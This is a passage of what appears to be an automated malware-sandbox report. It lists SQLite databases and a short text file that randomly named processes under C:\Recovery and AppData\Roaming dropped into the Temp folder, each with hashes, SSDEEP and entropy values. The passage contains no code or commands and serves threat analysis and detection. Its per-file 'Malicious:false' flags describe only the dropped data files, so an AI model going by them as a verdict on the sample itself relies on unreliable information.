                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\asMiv0NQX3

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):25
                                                                                Entropy (8bit):4.053660689688185
                                                                                Encrypted:false
                                                                                SSDEEP:3:SEFNwrT/n:Srj
                                                                                MD5:34B0D678425A7C109A0CDBEF2C758478
                                                                                SHA1:D8DA5767C9E11639DD901EE2DA90F0655E3ED1CB
                                                                                SHA-256:AECAA358618F232A26D0D1310A570FC2C7DD221017058402BA585E5A55EBDABD
                                                                                SHA-512:3433FBF8A457E71127D8F0AADD61F00A1A6BE84CA1606A342C051F86443390D40A7BE2C05A579A31801B15382F4FFFAE6CAD184E2F4D0B455A5C8F25F401F00E
                                                                                Malicious:false
                                                                                Preview:gAW30eZa0JkgZlmBNE3DNbVmm

                                                                                C:\Users\user\AppData\Local\Temp\b4dGDJjTOF

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\bCG9t5hQQL

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\bKT22cyQCB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\bM63ETQKP4

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\bobGq328xS

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\cFxbNmmXXy

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\cQH4grE6Ql

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\cr5bLMvFt1

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\d7THhZfORM

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\dViI4f8bSP

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\eI7hHYO8p1

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\eR3WaI44GL

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\eoyKA2ccSR

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\fYyP30GvjK

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\fgcll20Z3b

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\fiQXVoqIRi

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\fjYxuHSdpj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\gCsaLHQcuF

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\gHY2jnDa3V

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\gW0QR9fGjy

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\gdMqLbqA3u

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\gdt1gCSUN6

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ggWxFSHMRB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
